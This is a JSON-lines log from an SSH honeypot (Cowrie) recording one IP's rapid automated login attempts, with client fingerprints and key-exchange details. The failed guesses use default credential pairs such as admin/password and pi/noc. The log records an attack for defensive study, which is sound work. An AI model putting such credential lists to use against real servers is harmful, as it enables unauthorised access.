{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.383111Z","src_ip":"87.120.191.13","session":"57c65ac13355"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35442,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6e9d62cea7b","protocol":"ssh","message":"New connection: 87.120.191.13:35442 (1.2.3.4:22) [session: e6e9d62cea7b]","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.402421Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.433110Z","src_ip":"87.120.191.13","session":"edf3999fefac"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.484001Z","src_ip":"87.120.191.13","session":"e6e9d62cea7b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.484799Z","src_ip":"87.120.191.13","session":"e6e9d62cea7b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.820814Z","src_ip":"87.120.191.13","session":"c93b5e05367a"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.828322Z","src_ip":"87.120.191.13","session":"e6e9d62cea7b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35450,"dst_ip":"1.2.3.4","dst_port":22,"session":"69d0c81222c0","protocol":"ssh","message":"New connection: 87.120.191.13:35450 (1.2.3.4:22) [session: 69d0c81222c0]","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.840063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.899138Z","src_ip":"87.120.191.13","session":"69d0c81222c0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:38.899962Z","src_ip":"87.120.191.13","session":"69d0c81222c0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"noc","message":"login attempt [admin/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.196762Z","src_ip":"87.120.191.13","session":"69d0c81222c0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.419631Z","src_ip":"87.120.191.13","session":"e6f034258693"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.434965Z","src_ip":"87.120.191.13","session":"1cca0c376b0c"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35456,"dst_ip":"1.2.3.4","dst_port":22,"session":"6263647d0664","protocol":"ssh","message":"New connection: 87.120.191.13:35456 (1.2.3.4:22) [session: 6263647d0664]","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.444512Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.446053Z","src_ip":"87.120.191.13","session":"4247fa6ec270"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.454931Z","src_ip":"87.120.191.13","session":"57c65ac13355"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35472,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dcd9164e6d4","protocol":"ssh","message":"New connection: 87.120.191.13:35472 (1.2.3.4:22) [session: 3dcd9164e6d4]","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.466141Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35486,"dst_ip":"1.2.3.4","dst_port":22,"session":"657506c75746","protocol":"ssh","message":"New connection: 87.120.191.13:35486 (1.2.3.4:22) [session: 657506c75746]","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.473887Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35498,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c2eac067ebc","protocol":"ssh","message":"New connection: 87.120.191.13:35498 (1.2.3.4:22) [session: 7c2eac067ebc]","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.483290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.487929Z","src_ip":"87.120.191.13","session":"6263647d0664"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.489281Z","src_ip":"87.120.191.13","session":"6263647d0664"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.498128Z","src_ip":"87.120.191.13","session":"edf3999fefac"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.501427Z","src_ip":"87.120.191.13","session":"657506c75746"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.501947Z","src_ip":"87.120.191.13","session":"657506c75746"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.518274Z","src_ip":"87.120.191.13","session":"7c2eac067ebc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.519257Z","src_ip":"87.120.191.13","session":"7c2eac067ebc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.527537Z","src_ip":"87.120.191.13","session":"3dcd9164e6d4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.528040Z","src_ip":"87.120.191.13","session":"3dcd9164e6d4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35506,"dst_ip":"1.2.3.4","dst_port":22,"session":"24de961cfe22","protocol":"ssh","message":"New connection: 87.120.191.13:35506 (1.2.3.4:22) [session: 24de961cfe22]","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.532131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.566645Z","src_ip":"87.120.191.13","session":"24de961cfe22"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.567373Z","src_ip":"87.120.191.13","session":"24de961cfe22"}
{"eventid":"cowrie.login.failed","username":"noc","password":"noc","message":"login attempt [noc/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.717870Z","src_ip":"87.120.191.13","session":"6263647d0664"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"noc","message":"login attempt [ftpuser/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.730356Z","src_ip":"87.120.191.13","session":"657506c75746"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"noc","message":"login attempt [ftpuser/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.737836Z","src_ip":"87.120.191.13","session":"7c2eac067ebc"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"noc","message":"login attempt [ubnt/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.743222Z","src_ip":"87.120.191.13","session":"24de961cfe22"}
{"eventid":"cowrie.login.failed","username":"pi","password":"noc","message":"login attempt [pi/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.756067Z","src_ip":"87.120.191.13","session":"3dcd9164e6d4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.879086Z","src_ip":"87.120.191.13","session":"e6e9d62cea7b"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35514,"dst_ip":"1.2.3.4","dst_port":22,"session":"d699d8ed0625","protocol":"ssh","message":"New connection: 87.120.191.13:35514 (1.2.3.4:22) [session: d699d8ed0625]","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.920646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.946287Z","src_ip":"87.120.191.13","session":"d699d8ed0625"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:39.946900Z","src_ip":"87.120.191.13","session":"d699d8ed0625"}
{"eventid":"cowrie.login.failed","username":"student","password":"noc","message":"login attempt [student/noc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.162287Z","src_ip":"87.120.191.13","session":"d699d8ed0625"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.257531Z","src_ip":"87.120.191.13","session":"69d0c81222c0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35530,"dst_ip":"1.2.3.4","dst_port":22,"session":"44957d519d4e","protocol":"ssh","message":"New connection: 87.120.191.13:35530 (1.2.3.4:22) [session: 44957d519d4e]","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.289485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.315306Z","src_ip":"87.120.191.13","session":"44957d519d4e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.315945Z","src_ip":"87.120.191.13","session":"44957d519d4e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.532006Z","src_ip":"87.120.191.13","session":"44957d519d4e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.780741Z","src_ip":"87.120.191.13","session":"6263647d0664"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.795144Z","src_ip":"87.120.191.13","session":"657506c75746"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.797678Z","src_ip":"87.120.191.13","session":"24de961cfe22"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.803807Z","src_ip":"87.120.191.13","session":"7c2eac067ebc"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35540,"dst_ip":"1.2.3.4","dst_port":22,"session":"980268adc3ee","protocol":"ssh","message":"New connection: 87.120.191.13:35540 (1.2.3.4:22) [session: 980268adc3ee]","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.809153Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.821835Z","src_ip":"87.120.191.13","session":"3dcd9164e6d4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35552,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c606bd706e5","protocol":"ssh","message":"New connection: 87.120.191.13:35552 (1.2.3.4:22) [session: 6c606bd706e5]","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.823544Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35554,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e23aeb1a9ae","protocol":"ssh","message":"New connection: 87.120.191.13:35554 (1.2.3.4:22) [session: 2e23aeb1a9ae]","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.826130Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35560,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc33cd9f0e18","protocol":"ssh","message":"New connection: 87.120.191.13:35560 (1.2.3.4:22) [session: fc33cd9f0e18]","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.843488Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35562,"dst_ip":"1.2.3.4","dst_port":22,"session":"d610aa1476df","protocol":"ssh","message":"New connection: 87.120.191.13:35562 (1.2.3.4:22) [session: d610aa1476df]","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.845672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:40.854617Z","src_ip":"87.120.191.13","session":"2e23aeb1a9ae"}
